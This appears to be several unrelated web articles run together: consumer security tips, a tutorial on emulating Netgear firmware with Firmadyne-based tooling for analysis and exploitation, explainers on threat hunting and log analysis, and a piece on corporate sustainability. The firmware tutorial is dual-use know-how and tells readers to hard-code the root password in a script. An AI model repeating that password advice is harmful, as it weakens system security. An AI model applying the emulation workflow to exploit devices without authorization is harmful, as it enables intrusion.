*content courtesy of OneAffiniti funded by Citrix | <urn:uuid:3a6dc433-34d9-437a-82d2-f64a40d22d22> | CC-MAIN-2022-40 | https://logicalfront.com/ai-education-trends-implications/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00094.warc.gz | en | 0.938643 | 819 | 3.46875 | 3 |
It’s the last day of October, which means this year’s National Cybersecurity Month is officially ending. But that doesn’t mean you should stop taking measures to #StayCyberSafe! This year, the NCSAM theme was “Own IT, Secure IT, Protect IT” – let’s take a look at some of the tips that were presented this month.
We’re almost constantly connected, whether at home, at work, at school, or even on vacation. With mobile phones and Internet of Things devices, there are more ways to be connected than ever before. Not only that, we also have many accounts which collect our information.
- Don’t overshare on social media. #BeCyberSmart about where you share your information and who you share it with. Connect only with people you know and trust.
- Set privacy and security settings to limit what your devices and social media accounts share about you.
- Keep tabs on your apps; only download from legitimate, trusted sources. Review the permissions those apps are asking for, and deny any that don’t make sense.
Security breaches seem to be happening more and more often; they’re hardly front page news any more. Your personal information is valuable, so do what you can to keep it out of the hands of cyber criminals.
- Use strong passwords, and don’t use the same password on multiple accounts. A password manager can help you keep track of all those strong, unique passwords for your accounts. Some can even help you share access with trusted partners or family members, without requiring you to give them the password.
- No matter how strong your password is, if a breach occurs, your account may be vulnerable. Enable multi-factor authentication to add another layer of security and help ensure the only person who can access your account is you.
- Don’t get hooked by a phishing scam! Be very cautious when opening emails, and never click on links or attachments sent by people you don’t know. Even if the email looks like it’s from a friend, coworker, or your boss, be wary of clicking on links. Scammers can spoof email addresses, so it’s best to check the legitimacy of the email, especially if it’s urging you to click or open something right away.
While today’s technology allows us to shop, bank, communicate, and entertain ourselves anywhere, this convenience comes with an increased risk. Smart home devices, such as thermostats, door locks, and cameras can make our lives easier and save time and money, but be aware of the additional security risk that comes with these smart devices.
- Your wireless router is the main entryway to all your connected devices, so be sure to change the default user name and password, keep the firmware up to date, and set a password on your Wi-Fi network. Also, change the default credentials on all your smart devices, and make sure you understand the permissions and access they have to your network, your information, and your personal space. Assume a smart speaker is always listening, and a smart camera is always watching.
- Keep software and firmware on all your devices up to date. Your computer, smart phone, router, and many smart home devices get updates to help keep them protected from ever-changing threats. If you have an older device, make sure it’s still being supported; sometimes, it’s just time to get rid of that old streaming device to help protect the rest of your home.
- Public Wi-Fi is not safe or secure. Even a public Wi-Fi network with a password could be compromised. If you must use public Wi-Fi, be sure it’s the actual network provided by the location. Use a VPN service to protect the privacy of the information you’re sending, and avoid accessing sensitive accounts such as financial and banking accounts while on public Wi-Fi.
As we move into the holiday season and the new year, keep these cyber security tips in mind. OWN IT, Secure IT, and Protect IT to keep yourself and your family #CyberSafe. | <urn:uuid:165badf6-040c-4a7e-ab12-9a2fdb266e29> | CC-MAIN-2022-40 | https://milepost42.com/cybersecurity/national-cybersecurity-month-wrap-up/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00094.warc.gz | en | 0.920435 | 876 | 2.546875 | 3 |
In this post, we will have a look at how we can perform Firmware Emulation of a given IoT device.
Firmware Emulation can serve a number of different purposes such as analyzing the firmware in a better way, performing exploitation, performing remote debugging and so on.
With this technique, you can emulate a Firmware originally meant to be run on a different architecture, and interact with it, even without having a physical IoT device.
One of the earlier ways of performing Firmware Emulation was to create a Qemu image, copy the firmware file system's contents onto the Qemu image, and then launch the image.
However, there exists a much simpler alternative that is also likely to give you fewer issues while emulating firmware. Let's have a look.
Tools that you would require:
- AttifyOS VM or any Linux based image
- Firmware Analysis Toolkit (https://github.com/attify/firmware-analysis-toolkit)
- A firmware that you want to emulate (for example, Netgear WNAP320)
Setting things up
Once you have all three of the above components, the first step is to set up Firmware Analysis Toolkit.
Firmware Analysis Toolkit is simply a wrapper around the actual project Firmadyne and automates the process of emulating a new firmware.
To download and install FAT, simply clone the git repository recursively as shown below:
git clone --recursive https://github.com/attify/firmware-analysis-toolkit.git
Next, we will need to setup the individual tools such as Binwalk, Firmadyne and Firmware-Mod-Kit.
Set up Binwalk
To set up Binwalk, simply install the dependencies as shown below and then install the tool:
cd firmware-analysis-toolkit/binwalk
sudo ./deps.sh
sudo python setup.py install
If everything went well, you should be able to run binwalk and receive an output as shown below.
Set up Firmadyne
To set up Firmadyne, navigate to the firmadyne folder and open up firmadyne.config. It should look as shown in the picture below.
Uncomment the line saying FIRMWARE_DIR=/home/vagrant/firmadyne/ and modify the address to the current path of Firmadyne. The updated line in my case looks as shown below.
Once you have updated the path, the next step is to download the additional binaries required for Firmadyne to work. This might take a while (1-2 minutes on a good internet connection), so have a coffee (or beer) while you wait.
Once it is done, the next step is to install the remaining dependencies for Firmadyne to function properly:
sudo -H pip install git+https://github.com/ahupp/python-magic
sudo -H pip install git+https://github.com/sviehb/jefferson
sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
Also set up a PostgreSQL database at this point following the instructions from the official Firmadyne wiki:
sudo apt-get install postgresql
sudo -u postgres createuser -P firmadyne
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./firmadyne/database/schema
The password for the database, when prompted, should be firmadyne (to avoid any later issues).
That is all for the setup of Firmadyne.
Set up Firmware Analysis Toolkit
The first thing that we will do is move reset.py to inside the firmadyne directory.
Once that is done, open up fat.py and modify the root password (so that it won't ask you for a password while running the script) and specify the path of firmadyne as shown below.
That's all for the setup. Make sure that your PostgreSQL database is up and running, and we are good to go.
Emulating a firmware image
All you need to do now in order to emulate a firmware is run ./fat.py and specify the firmware name. In this case, we are running the WNAP320.zip firmware, so we will specify that. For the brand, you can specify any brand, as that is used purely for database purposes. Your output should be as shown below:
Once it has completed the initial setup process for the firmware, it will provide you with an IP address. In case the firmware runs a web server, you should be able to access the web interface, as well as interact with the firmware over SSH and perform additional network based exploitation.
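If you want to automate this check (for example, when emulating many firmware images in a batch), a short script can poll the web interface until the emulated system finishes booting. The Python sketch below uses only the standard library; the IP address in the commented-out call is a placeholder for whatever fat.py reports for your firmware:

```python
import time
import urllib.request
import urllib.error

def wait_for_web_ui(ip, port=80, timeout=120, interval=5):
    """Poll the emulated device until its web server answers; None on timeout."""
    url = f"http://{ip}:{port}/"
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            with urllib.request.urlopen(url, timeout=5) as resp:
                return resp.status  # any HTTP response means the server is up
        except (urllib.error.URLError, OSError):
            time.sleep(interval)  # not up yet; the qemu boot can take a while
    return None

# Placeholder IP -- substitute the address printed by fat.py for your firmware:
# print(wait_for_web_ui("192.168.0.100"))
```

Emulated firmware can take a minute or more to boot, so a generous timeout is worthwhile.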
Let's now open up Firefox and see if we are able to access the web interface.
Congratulations! We have successfully emulated a firmware (which was originally meant for the MIPS big-endian architecture) and even have the web server from within the firmware accessible!
That is all for this blog post. For any further queries, feel free to reach out to us using our contact page.
IoT Penetration Testing and Exploitation training
You can also now sign up for one of our public training bootcamps where you can learn all about IoT Exploitation (Embedded, Firmware, Radio, BLE, ZigBee, Binary etc.) - https://www.attify-store.com/collections/real-world-training/products/offensive-iot-exploitation-live-training | <urn:uuid:6c2b4197-de82-4644-9e4e-def1becd5657> | CC-MAIN-2022-40 | https://blog.attify.com/getting-started-with-firmware-emulation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00094.warc.gz | en | 0.853141 | 1,205 | 2.515625 | 3 |
What is Proactive Threat Hunting?

Threat hunting is designed to identify unknown threats within an organization’s systems. Unlike reactive cybersecurity methods, which involve responding to a known threat or attack, threat hunting is based on a hypothesis regarding a threat that the organization might be facing.

Many organizations have a security strategy focused on detecting and preventing cyberattacks, but this isn’t enough for security. Threat hunting enables an organization to detect and respond to cyber threats that bypass an organization’s cyber defenses. This is essential for mitigating attacks by advanced cyber threat actors that have experience in evading common defenses. Every organization should engage in threat hunting as part of a defense-in-depth strategy. Proactive security enables an organization to detect missed attacks and can help to inform and improve preventative defenses.
Reactive vs. Proactive Threat Hunting
The tools and techniques used in threat hunting are similar to those used when responding to security incidents. In both cases, cybersecurity analysts perform an in-depth analysis of systems to identify indicators of attack. The main difference between the two processes is the starting point: a known incident vs. a hypothesis about a potential threat.
While proactive and reactive investigations use similar techniques, they also have significant differences. Some major differentiators include:
- Scope of Investigation: When investigating a known attack, the scope of investigation is relatively limited as some links in the attack chain are known and the analyst needs to work forward and backward from there. Threat hunting can include a much wider scope of investigation because it involves looking into a completely unknown potential threat.
- Application of Threat Intelligence: Both reactive and proactive investigations use threat intelligence, but they use this data in different ways. Reactive analysis can use threat intelligence to identify incoming or ongoing threats. In contrast, proactive threat hunting uses threat intelligence to determine which threats that an organization may face and how they can be detected.
- Depth of Investigation: An incident response investigation only needs to go far enough to verify a threat and collect any necessary information for remediation. Threat hunting, on the other hand, needs to prove or disprove a theory, which can be more difficult.
- Duration of Impact: The desired end result of incident response is the removal of a present threat. Threat hunting can not only help with the remediation of past attacks but can also help to close visibility gaps and improve defenses for the future.
Cyber Threat Hunting is a Proactive Approach

Done properly, threat hunting is a proactive approach to security. It is based on testing hypotheses about potential attacks rather than digging into threats that have raised alerts on enterprise security solutions. With the right tools, techniques, and processes, as outlined below, a threat hunter can identify previously unknown threats within an organization’s IT architecture and close overlooked security holes to help prevent future attacks from occurring.
Proactive Threat Hunting Tools

Threat hunters need different tools and data sources than incident responders because they need to develop their own hypotheses and guide their own investigations. Threat hunters need an investigative portal focused on detecting the TTPs of known threats within an organization’s systems rather than retracing the path of a known intrusion from initial access to final objective.
Build a Threat Hunting Hypothesis

To be proactive, threat hunters need to investigate a threat that they don’t already know exists. To do so, threat hunters develop a hypothesis about a potential threat that the organization may be facing, based upon threat intelligence and knowledge of the organization’s IT environment. This hypothesis should be defined so that it can be proven or disproven based on the collection and analysis of security data within the company’s environment.
Back Your Hypothesis with Evidence

The objective of a threat hunt is to prove or disprove the hypothesis, which requires data. Threat hunters may collect data from various platforms and data sources, such as system and application logs, security tools, and dark web threat intelligence. All of this data should be aggregated for analysis, and the data sources and collection methods should be documented.
Analyze Your Collected Data

After the necessary data has been collected, threat hunters can analyze it to prove or disprove their hypothesis. This could involve the development of new data analytics which can later be incorporated into defensive tools to provide visibility into this threat in the future. Proving or disproving a hypothesis may require multiple rounds of data collection and analysis if the original data set does not provide a definitive answer.
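As a minimal illustration of what such an analytic might look like, the Python sketch below tests a simple hypothesis (that an attacker is brute-forcing logins) against a handful of inline authentication events. The event records, field names, and threshold are all invented for illustration; in practice they would come from your own log store and threat intelligence:

```python
from collections import defaultdict

# Hypothetical, simplified auth events -- in practice these would be pulled
# from your aggregated log store (SIEM, data lake, etc.), in time order.
events = [
    {"src": "10.0.0.5", "user": "admin", "result": "fail"},
    {"src": "10.0.0.5", "user": "admin", "result": "fail"},
    {"src": "10.0.0.5", "user": "admin", "result": "fail"},
    {"src": "10.0.0.5", "user": "admin", "result": "success"},
    {"src": "10.0.0.9", "user": "alice", "result": "success"},
]

def hunt_brute_force(events, fail_threshold=3):
    """Flag sources whose failed logins reach the threshold and then succeed."""
    fails = defaultdict(int)
    suspects = set()
    for e in events:
        if e["result"] == "fail":
            fails[e["src"]] += 1
        elif fails[e["src"]] >= fail_threshold:
            suspects.add(e["src"])  # success after a burst of failures
    return sorted(suspects)

print(hunt_brute_force(events))  # -> ['10.0.0.5']
```

A real hunt would run analytics like this over weeks of data and many event types; the point is that the hypothesis is expressed as a concrete, testable condition over the collected evidence.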
Document the Hunt

Documentation is a key step in the threat hunting process. A threat hunt is an in-depth investigation of a potential threat, including data collection, the development of analytics to identify potential threats from this data, and proving or disproving that hypothesis. By documenting this process, a threat hunter provides a reference for the future. This not only helps to avoid duplicated effort but also makes it easier to repeat or improve on the process in the future.
The Bottom Line
Threat hunting is a vital, proactive component of a corporate cybersecurity strategy. It complements traditional, reactive cyber defense by enabling security analysts to seek out and remediate previously unknown vulnerabilities and intrusions into their environments.
A purely reactive cybersecurity strategy means that a company is always playing catch-up and providing attackers with a window to work toward their objectives and cause harm to the organization before threats are detected and remediated. As cyber threats become more sophisticated and automated, detecting them and remediating them will only become more difficult.
Threat hunting provides an organization with the ability to respond to cyberattacks that went undetected by existing defenses. By performing threat hunts, security analysts can not only remediate overlooked attacks but also develop methods for closing security visibility gaps, improving existing defenses and pursuing adversaries. Threat hunting not only helps to mitigate past and present attacks but also provides a path to improve security for the future.
More Useful Resources
Threat Hunting Guide: How To Protect Critical Assets Through Systematic, Proactive Threat Intelligence
3 Steps To Take Before Executing A Cyber Threat Hunt
How should you go about planning a cyber threat hunt? It comes down to three steps. By investing in each of these planning steps up front, your team can prepare itself both to execute the threat hunt relatively quickly and to ensure that the threat hunt answers your most urgent questions. Here’s a look at how to conduct those three steps of the planning process. | <urn:uuid:24eb2f53-da6e-4902-a37a-f57dfb66a314> | CC-MAIN-2022-40 | https://www.cybersixgill.com/resources/education/threat-hunting-explained/cyber-hunt-with-proactive-threat-intelligence/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00295.warc.gz | en | 0.938128 | 1,289 | 2.59375 | 3 |
Log analysis is the process of reviewing computer-generated event logs to proactively identify bugs, security threats or other risks. Log analysis can also be used more broadly to ensure compliance with regulations or review user behavior.
A log is a comprehensive file that captures activity within the operating system, software applications or devices. The log file automatically documents any information designated by the system administrators, including: messages, error reports, file requests, file transfers and sign-in/out requests. The activity is also timestamped, which helps IT professionals and developers establish an audit trail in the event of a system failure, breach or other outlying event.
Why is log analysis important?
In many cases, log analysis is a matter of law. Organizations must adhere to specific regulations that dictate how data is archived and analyzed.
Beyond regulatory compliance, log analysis, when done effectively, can unlock many benefits for the business. These include:
Organizations that regularly review and analyze logs are typically able to identify errors more quickly. With an advanced log analysis tool, the business may even be able to pinpoint problems before they occur, which greatly reduces the time and cost of remediation.
The log also helps the log analyzer review the events leading up to the error, which may make the issue easier to troubleshoot, as well as prevent in the future.
Effective log analysis dramatically strengthens the organization’s cybersecurity capabilities. Regular review and analysis of logs helps organizations more quickly detect anomalies, contain threats and prioritize responses.
Improved customer experience
Log analysis helps businesses ensure that all customer-facing applications and tools are fully operational and secure. The consistent and proactive review of log events helps the organization quickly identify disruptions or even prevent such issues—improving satisfaction and reducing turnover.
How is log analysis performed?
Log analysis is typically done within a Log Management System, a software solution that gathers, sorts and stores log data and event logs from a variety of sources.
A log management platform allows the IT team and security professionals to establish a single point from which to access all relevant endpoint, network, and application data. Typically, this log data is fully indexed and searchable, which means the log analyzer can easily access the data they need to make decisions about network health, resource allocation, or security.
Activity typically includes:
Ingestion: Installing a log collector to gather data from a variety of sources, including the OS, applications, servers, hosts and each endpoint, across the network infrastructure.
Centralization: Aggregating all log data in a single location as well as a standardized format regardless of the log source. This helps simplify the analysis process and increase the speed at which data can be applied throughout the business.
Search and analysis: Leveraging a combination of AI/ML-enabled log analytics and human resources to review and analyze known errors, suspicious activity or other anomalies within the system. Given the vast amount of data available within the log, it is important to automate as much of the log file analysis process as possible. It is also recommended to create a graphical representation of data, through knowledge graphing or other technique, to help the IT team visualize each log entry, its timing and interrelations.
Monitoring and alerts: The log management system should leverage advanced log analytics to continuously monitor the log for any log event that requires attention or human intervention. The system can be programmed to automatically issue alerts when certain events take place or certain conditions are not met.
Reporting: Finally, the LMS should provide a streamlined report of all events as well as an intuitive interface that the log analyzer can leverage to get additional information from the log.
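The ingestion-and-centralization steps above can be sketched in a few lines. The entry formats, field names and alert keywords below are illustrative assumptions for the sketch, not the schema of any particular log management system:

```python
from datetime import datetime, timezone

# Hypothetical raw entries from two different sources, in different formats.
syslog_entries = ["2024-03-01T10:15:00Z host1 sshd: Failed password for root"]
app_entries = [{"ts": 1709288100, "service": "api", "msg": "timeout contacting db"}]

def centralize(syslog, app):
    """Aggregate heterogeneous log entries into one standardized format."""
    events = []
    for line in syslog:
        ts, host, msg = line.split(" ", 2)
        events.append({"timestamp": ts, "source": host, "message": msg})
    for rec in app:
        dt = datetime.fromtimestamp(rec["ts"], tz=timezone.utc)
        events.append({"timestamp": dt.strftime("%Y-%m-%dT%H:%M:%SZ"),
                       "source": rec["service"], "message": rec["msg"]})
    return sorted(events, key=lambda e: e["timestamp"])

def alerts(events, keywords=("failed", "timeout")):
    """Flag events that may require attention or human intervention."""
    return [e for e in events if any(k in e["message"].lower() for k in keywords)]

events = centralize(syslog_entries, app_entries)
print(alerts(events))
```

Once every source lands in one standardized, time-ordered format, the monitoring and reporting stages can operate on a single stream instead of one parser per source.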
The limitations of indexing
Many log management software solutions rely on indexing to organize the log. While this was considered an effective solution in the past, indexing can be a very computationally-expensive activity, causing latency between data entering a system and then being included in search results and visualizations. As the speed at which data is produced and consumed increases, this is a limitation that could have devastating consequences for organizations that need real-time insight into system performance and events.
Further, with index-based solutions, search patterns are also defined based on what was indexed. This is another critical limitation, particularly when an investigation is needed and the available data can’t be searched because it wasn’t properly indexed.
Leading solutions offer free-text search, which allows the IT team to search any field in any log. This capability helps to improve the speed at which the team can work without compromising performance.
Log analysis methods
Given the massive amount of data being created in today’s digital world, it has become impossible for IT professionals to manually manage and analyze logs across a sprawling tech environment. As such, they require an advanced log management system and techniques that automate key aspects of the data collection, formatting and analysis processes.
These techniques include:
Normalization is a data management technique that ensures all data and attributes, such as IP addresses and timestamps, within the transaction log are formatted in a consistent way.
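A minimal sketch of timestamp normalization follows. The three input formats are hypothetical examples; real log managers handle far more formats, plus IP addresses and other attributes:

```python
from datetime import datetime, timezone

def normalize_timestamp(raw):
    """Convert several common timestamp formats to one ISO-8601 UTC string."""
    for fmt in ("%Y-%m-%dT%H:%M:%S%z", "%d/%b/%Y:%H:%M:%S %z", "%Y-%m-%d %H:%M:%S"):
        try:
            dt = datetime.strptime(raw, fmt)
        except ValueError:
            continue
        if dt.tzinfo is None:
            dt = dt.replace(tzinfo=timezone.utc)  # assumption: naive stamps are UTC
        return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    raise ValueError(f"unrecognized timestamp: {raw!r}")

# An Apache-style stamp and a bare ISO stamp normalize to the same form.
print(normalize_timestamp("01/Mar/2024:10:15:00 +0000"))
print(normalize_timestamp("2024-03-01 10:15:00"))
```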
Pattern recognition refers to filtering events based on a pattern book in order to separate routine events from anomalies.
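At its simplest, the "pattern book" is a list of regular expressions describing routine, expected events; anything unmatched is surfaced as an anomaly. The patterns below are invented for illustration:

```python
import re

# A tiny pattern book of routine, expected events.
ROUTINE_PATTERNS = [
    re.compile(r"session opened for user \w+"),
    re.compile(r"health check (passed|ok)", re.IGNORECASE),
]

def is_routine(message):
    return any(p.search(message) for p in ROUTINE_PATTERNS)

log = [
    "session opened for user alice",
    "Health check OK",
    "disk I/O error on /dev/sda1",
]
anomalies = [m for m in log if not is_routine(m)]
print(anomalies)  # ['disk I/O error on /dev/sda1']
```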
Classification and tagging
Classification and tagging is the process of tagging events with key words and classifying them by group so that similar or related events can be reviewed together.
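A toy illustration of keyword-based tagging; the tag names and keyword rules here are invented for the example, and production systems use much richer classifiers:

```python
# Hypothetical keyword-to-tag rules.
TAG_RULES = {
    "auth": ("login", "password", "session"),
    "storage": ("disk", "volume", "quota"),
    "network": ("timeout", "unreachable", "dns"),
}

def tag_event(message):
    """Return the sorted list of tags whose keywords appear in the message."""
    msg = message.lower()
    return sorted(tag for tag, kws in TAG_RULES.items()
                  if any(kw in msg for kw in kws))

for e in ["Failed password for root", "disk quota exceeded", "DNS timeout"]:
    print(e, "->", tag_event(e))
```

Once events carry tags, related events can be pulled up together regardless of which source emitted them.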
Correlation analysis is a technique that gathers log data from several different sources and reviews the information as a whole using log analytics.
Artificial ignorance refers to the active disregard for entries that are not material to system health or performance.
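Artificial ignorance is essentially an inverse filter: known-immaterial entries are dropped so attention goes to what remains. The ignore list below is a hypothetical example:

```python
# Entries matching these substrings are treated as immaterial noise.
IGNORE = ("cron job started", "debug:", "heartbeat")

def material(entries):
    """Actively disregard entries that say nothing about health or performance."""
    return [e for e in entries if not any(s in e.lower() for s in IGNORE)]

log = ["heartbeat ok", "DEBUG: cache warm", "CPU temperature critical"]
print(material(log))  # ['CPU temperature critical']
```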
Log analysis use case examples
Effective log analysis has use cases across the enterprise. Some of the most useful applications include:
Development and DevOps
Log analysis tools and log analysis software are invaluable to DevOps teams, as they require comprehensive observability to see and address problems across the infrastructure. Further, because developers are creating code for increasingly-complex environments, they need to understand how code impacts the production environment after deployment.
An advanced log analysis tool will help developers and DevOps organizations easily aggregate data from any source to gain instant visibility into their entire system. This allows the team to identify and address concerns, as well as seek deeper information.
Security, SecOps, and Compliance
Log analysis increases visibility, which grants cybersecurity, SecOps, and compliance teams continuous insights needed for immediate actions and data-driven responses. This in turn helps strengthen the performance across systems, prevent infrastructure breakdowns, protect against attacks and ensure compliance with complex regulations.
Advanced technology also allows the cybersecurity team to automate much of the log file analysis process and set up detailed alerts based on suspicious activity, thresholds or logging rules. This allows the organization to allocate limited resources more effectively and enable human threat hunters to remain hyper-focused on critical activity.
Information Technology and ITOps
Visibility is also important to IT and ITOps teams as they require a comprehensive view across the enterprise in order to identify and address concerns or vulnerabilities.
For example, one of the most common use cases for log analysis is in troubleshooting application errors or system failures. An effective log analysis tool allows the IT team to access large amounts of data to proactively identify performance issues and prevent interruptions.
Log Everything, Answer Anything – For Free
Falcon LogScale Community Edition (previously Humio) offers a free modern log management platform for the cloud. Leverage streaming data ingestion to achieve instant visibility across distributed systems and prevent and resolve incidents.
Falcon LogScale Community Edition, available instantly at no cost, includes the following:
- Ingest up to 16GB per day
- 7-day retention
- No credit card required
- Ongoing access with no trial period
- Index-free logging, real-time alerts and live dashboards
- Access our marketplace and packages, including guides to build new packages
- Learn and collaborate with an active community | <urn:uuid:0d7e3d89-d3fb-4135-882a-0dbcdf6f3b1e> | CC-MAIN-2022-40 | https://www.crowdstrike.com/cybersecurity-101/observability/log-analysis/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00295.warc.gz | en | 0.925099 | 1,630 | 3.109375 | 3 |
Previous decades have seen businesses taking less interest in sustainability. But today, many more organizations are integrating their corporate social responsibility into every aspect of the company’s sustainable strategy.
But what do sustainable business strategies aim to achieve? Why are they important? And what benefits do they have to the business and the environment? We will answer all these questions to discover how to build a sustainable business strategy. We will begin with a definition.
What Is A Sustainable Business Strategy?
Business models today incorporate more responsibility than ever before. Beyond profits, more prominent and small organizations are attempting to use sustainable business practices for environmental and social responsibility to the planet and employees.
A sustainable business strategy interweaves environmental, social, and economic considerations into an organization’s practices, policies, and processes. This strategy ensures long-term value for the company and its employees by protecting and sustaining natural resources and working toward an output of net zero emissions.
The Value Of Sustainable Business Practices
Environmental and social issues can seem at odds with business, as generating maximum profits is sometimes challenging with ethics as the focus. However, being mindful of social issues ensures high employee experience levels and team cohesion. Taking part in awareness-raising projects for environmental problems can also be used as a team-building exercise that improves employee productivity and gives a competitive advantage.
A recent Gartner study found that customer engagement is at the heart of corporate incentives to engage with sustainability issues. Gartner found that in 2020, 63% of sustainable companies felt that customers were their most powerful reason for sustainability actions. As a result of this sustainability drive, 92% of organizations in the study said they are increasing spending on sustainability as part of their company strategy.
Why Sustainable Business Strategies Are Important
Business has a huge impact on the environment and many social implications. Sustainability initiatives to reach zero emissions, such as solar panels or glass, help achieve a company’s commitment to preserving the environment. But renewable energy efficiency doesn’t just save the environment; it also reduces the operational costs of organizational infrastructure.
Advertising long-term sustainability targets to tackle climate change and taking a stand on this issue enhances a company’s image. Customers are at the heart of all business practices, so a sustainable business strategy can help ensure existing customers keep returning and new customers feel a sustainable company is attractive to them and use their services.
The Benefits of Launching A Sustainable Business Strategy
The benefits of using a sustainable business strategy are multi-faceted. The first of these benefits involves building communities. These benefits affect employees, the organization, and many environmental and social factors of the planet we share.
Sustainable business strategies can help nurture positive internal communities and make links with existing external ones. Efforts to conserve the environment and work toward addressing social inequalities can help large enterprises form relationships with charities, boosting morale and improving their image.
Such partnerships with altruistic agencies can create a sustainable and vibrant work culture within an environment that is:
- Lively and inclusive for everyone.
- A place where employees and customers feel safe.
- Carbon emissions neutral.
- Where disadvantaged staff and customers are supported.
- Where vulnerable people are empowered and protected.
- Where people feel proud to work.
This vision of a sustainable business is positive for the environment, employees, and customers. Such a culture also improves financial performance.
2. Improve Financial Performance
It is an easy argument to suggest that any sustainability strategy will reduce profits because it is not focused on increasing revenue. However, this is not the case. Sustainable business strategies lead to streamlined processes as part of strategic planning. Waste management reduces financial waste, supported by a culture of turning off lights and printing documents only when essential.
These actions have a knock-on effect from both an environmental and a business perspective. Key stakeholders feel proud of a company when it is reaching sustainability goals, and this translates into investment, increasing shareholder value and boosting business value.
There is also a competitive advantage when businesses operate this way, as higher investment improves company image and confidence within the market.
3. Enhance Company Culture
Business leaders often emphasize the environmental aspects of a sustainability strategy and forget that they also need to include social factors. A positive company culture supports and empowers more vulnerable or differently-abled employees and educates all employees on a variety of social needs. All employees are equipped with the knowledge to support and empower differently-abled customers, improving customer satisfaction.
Orienting company culture toward environmental issues also helps them comply with government regulations. These are legal obligations designed to protect a state’s environmental and social fabric. By voluntarily incorporating a sustainability strategy into a company’s culture, employees will already have received training in achieving environmental government regulations as part of strategic planning.
Sustainable strategies can also improve employee well-being, leading to improved employee retention.
4. Protect The Environment
The number one concern of any sustainability initiative is to protect the environment, regardless of the positive implications this might have for a business. Companies can use new technologies to engage in sustainability activities, such as providing lightning-fast Electric Vehicle (EV) charging points powered by solar panels on company buildings.
Other ways to protect the environment with sustainable business strategies are renewably powered delivery robots to cut CO2 and replacing harmful plastics like Styrofoam with sustainable packaging. Companies can also improve energy efficiency by enrolling in Energy as a Service (EaaS) programs which support the installation of renewable energy sources and only charge for energy on units used, rather than a rolling monthly amount.
These initiatives can help reduce environmental degradation as part of sustainable practices.
5 Key Steps To Planning A Sustainable Business Strategy
Sustainable business strategies are significant undertakings requiring detailed planning and ongoing review to achieve goals. The first step is to create goals that staff can easily action.
- Implement Actionable Goals
At the core of successful sustainability strategies are actionable goals. Achieving this involves asking what resources a company has, what they want to achieve, and the time to complete it. If organizations do not fulfill plans, they can be reviewed and rewritten. But without actionable goals in the first place, a sustainable business strategy will have no direction and will not succeed.
- Assess For Operational Weaknesses
An excellent place to begin when planning a sustainable business strategy is to identify operational weaknesses in your business. How much water is wasted by employees when they use the restroom? What food packaging does the office cafeteria use, and could catering staff take steps to replace this with an eco-friendly alternative? Could solar panels allow the entire office building to be self-sufficient for electricity usage?
Assessing these weaknesses creates a foundation for understanding what the organization can do to reduce the impact on the environment and the operation costs of a company’s infrastructure.
- Leverage Executive and Employee Support
Successful sustainable strategies have the support of high-level executives and all employees. Companies face an uphill battle without executive support to change the culture toward sustainable outcomes.
Presenting the business case for sustainable business strategies to executives using visualization and sustainability reports is an effective way of accomplishing this. When executives understand the benefits of sustainable business strategies and how they can begin creating long-term value for external stakeholders, company culture can change from the top down.
- Ensure Organizational Transparency
Reputational risks exist when customers feel that a company is engaging in a sustainable business strategy for the wrong reasons. PR and reputation improvement alone are not reasons for sustainable business strategies. Publishing monthly or annual sustainability reports and consumption patterns show the public that a company is delivering on its promise to be sustainable with a positive environmental impact.
- Communicate The Value and Benefits of The Strategy
Maintaining the momentum of sustainable business strategies can be challenging as enthusiasm can taper off with time. Communicating the value and benefits of sustainability practices should be an ongoing HR and PR collaboration to ensure that employees and customers are aware that the strategy is for life, not just a temporary measure for short-term gain.
Putting Sustainable Business Models Into Action
Sustainable business models depend on changes in culture. It is essential to ensure that executives fully understand the values, objectives and what part the sustainable business model plays in the company’s vision before implementing it.
Every organization operates differently depending on size and type, influencing operations and processes. Companies should implement sustainable business models the same way they implemented successful business models in the past: learn from past successes and incorporate sustainability practices into the model just as you would any other values-based business model.
Companies can use five steps to ensure sustainable business practice success:
- Step 1: Roll out the plan and create and communicate new practices and policies.
- Step 2: Utilise a sustainability measuring tool service to measure your sustainability level.
- Step 3: Analyse sustainable business strategy results against benchmarks.
- Step 4: Praise staff and communicate achievements.
- Step 5: Become sustainability certified or continue to review the strategy.
Following these steps ensures a structured approach to actioning a sustainable business strategy.
Building Sustainable Strategies That Last
There are other factors to consider that will increase your chances of success with a sustainable business strategy. The first of these involves new technology adoption.
1. Adopt New Technologies
As in every other aspect of business, innovation in sustainability means technology adoption.
New technologies to improve business sustainability include:
- Electric and public transport.
- LED lighting.
- Carbon capture and storage technology.
- Solar power.
But it’s not just the purchase of new technology that affects sustainability. Electronic waste (E-waste) is one of the most significant forms of poor sustainability practice in business. This waste comes from older, inactive technologies that IT teams replace with newer versions. IT departments can recycle obsolete equipment for components. So it is important to consider not only which new technologies are adopted, but also how companies dispose of the old devices.
Technology adoption involves constant research to be aware of how to continue to grow.
2. Identify and Capture Opportunities For Growth
The core of growth and strategic opportunities is research. CIOs must continuously research new technologies for sustainability. And companies can hire an external sustainability consultant to ensure that sustainability practices are planned, implemented, and maintained within a robust strategy.
3. Deploy Financial Risk Assessments
Financial risk is one of the predominant hesitations that prevent companies from engaging in a sustainable business strategy. Finance teams must carry out comprehensive risk assessments to ensure that every aspect of a sustainable business strategy is costed and clear deliverables can be recorded by staff using metrics. CIOs can collaborate with CFOs to provide the best analytics drawn from risk assessments to optimize any sustainability strategy.
Planning For Tomorrow
